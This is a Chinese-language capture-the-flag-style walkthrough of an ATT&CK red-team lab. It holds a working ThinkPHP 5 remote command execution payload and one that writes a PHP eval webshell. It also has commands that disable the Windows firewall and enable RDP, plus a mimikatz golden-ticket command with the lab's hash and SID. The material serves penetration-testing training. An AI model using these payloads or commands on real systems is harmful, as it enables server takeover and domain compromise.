ATT&CK实战系列——红队实战(五)

文章目录

环境搭建

http://vulnstack.qiyuanxuetang.net/vuln/detail/7/

官方描述

大家好,ATT&CK第五个攻防靶场已经出来了,此次靶场虚拟机共用两个,一个外网一个内网,用来练习红队相关内容和方向,主要包括常规信息收集、Web攻防、代码审计、漏洞利用、内网渗透以及域渗透等相关内容学习,此靶场主要用来学习,请大家遵守网络网络安全法。

描述
虚拟机密码
win7

sun\heart 123.com

sun\Administrator dc123.com

2008

sun\admin 2020.com

Win7双网卡模拟内外网

红队思路
一、环境搭建

1.环境搭建测试

2.信息收集

二、漏洞利用

3.漏洞搜索与利用

4.漏洞利用Getshell

5.系统信息收集

6.主机密码收集

三、内网搜集

7.内网–继续信息收集

8.内网攻击姿势–MS14-058

9.内网攻击姿势–MS17-010

四、横向移动

10.psexec远控

11.内网其它主机端口

12.netsh增删防火墙规则

五、构建通道

13.内网其它主机端口-代理转发

六、持久控制

14.域渗透-域成员信息收集

15.域渗透-基础服务弱口令探测及深度利用之powershell

16.域渗透-横向移动[wmi利用]

17.域渗透-域控实现与利用

七、痕迹清理

18、日志清理

前期信息搜集

80 一个 ThinkPHP 5

ATT&CK实战系列——红队实战(五)

目录扫描得到一个前辈的大马(真不错)

ATT&CK实战系列——红队实战(五)

爆破前辈webshell

拖到burp让它自己爆,接着往下做

ATT&CK实战系列——红队实战(五)

报错得到ThinkPHP 版本

ATT&CK实战系列——红队实战(五)

收集相关版本漏洞复现

ThinkPHP 5.0.22 任意命令执行getshell

payload:

/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

ATT&CK实战系列——红队实战(五)

定位网站路径

ATT&CK实战系列——红队实战(五)

linux 可以使用 echo 写入文件,win使用 php 文件函数 file_put_contents 写入shell

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=wpsec.php&vars[1][]=%3C%3Fphp%20eval(%24_POST%5B'pwd'%5D)%3B%3F%3E

ATT&CK实战系列——红队实战(五)

ATT&CK实战系列——红队实战(五)

我都getshell了这个还没跑出来,太真实了

ATT&CK实战系列——红队实战(五)

大马下下来看了源码后登录大马,其实密码还是挺简单的,我还是太菜了

ATT&CK实战系列——红队实战(五)

大马太垃圾了,什么都用不了,蚁剑直接就是admin权限,太爽了

ATT&CK实战系列——红队实战(五)

内网信息收集

arp信息

ATT&CK实战系列——红队实战(五)
dns信息

ATT&CK实战系列——红队实战(五)

内网渗透

定位域控上代理/CS

ATT&CK实战系列——红队实战(五)

ATT&CK实战系列——红队实战(五)

mimikatz 提取密码

ATT&CK实战系列——红队实战(五)

关闭防火墙,开启RDP

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
netsh firewall set opmode disable

ATT&CK实战系列——红队实战(五)

横向

ATT&CK实战系列——红队实战(五)

17010打不动

ATT&CK实战系列——红队实战(五)

wmiexec 横向

ATT&CK实战系列——红队实战(五)

黄金票据

域:SUN.com
SID:S-1-5-21-3388020223-1982701712-4030140183-500
NTLM:4709c610981029668df9d94ae48eb869

mimikatz # kerberos::golden /domain:sun.com /sid:S-1-5-21-3388020223-1982701712-4030140183-500 /user:wpsec /rc4:4709c610981029668df9d94ae48eb869 /ptt

ATT&CK实战系列——红队实战(五)

ipc登录

ATT&CK实战系列——红队实战(五)

上一篇:STM32如何计算RTC时钟异步预分频和同步预分频


下一篇:Web分布式系统集成Redis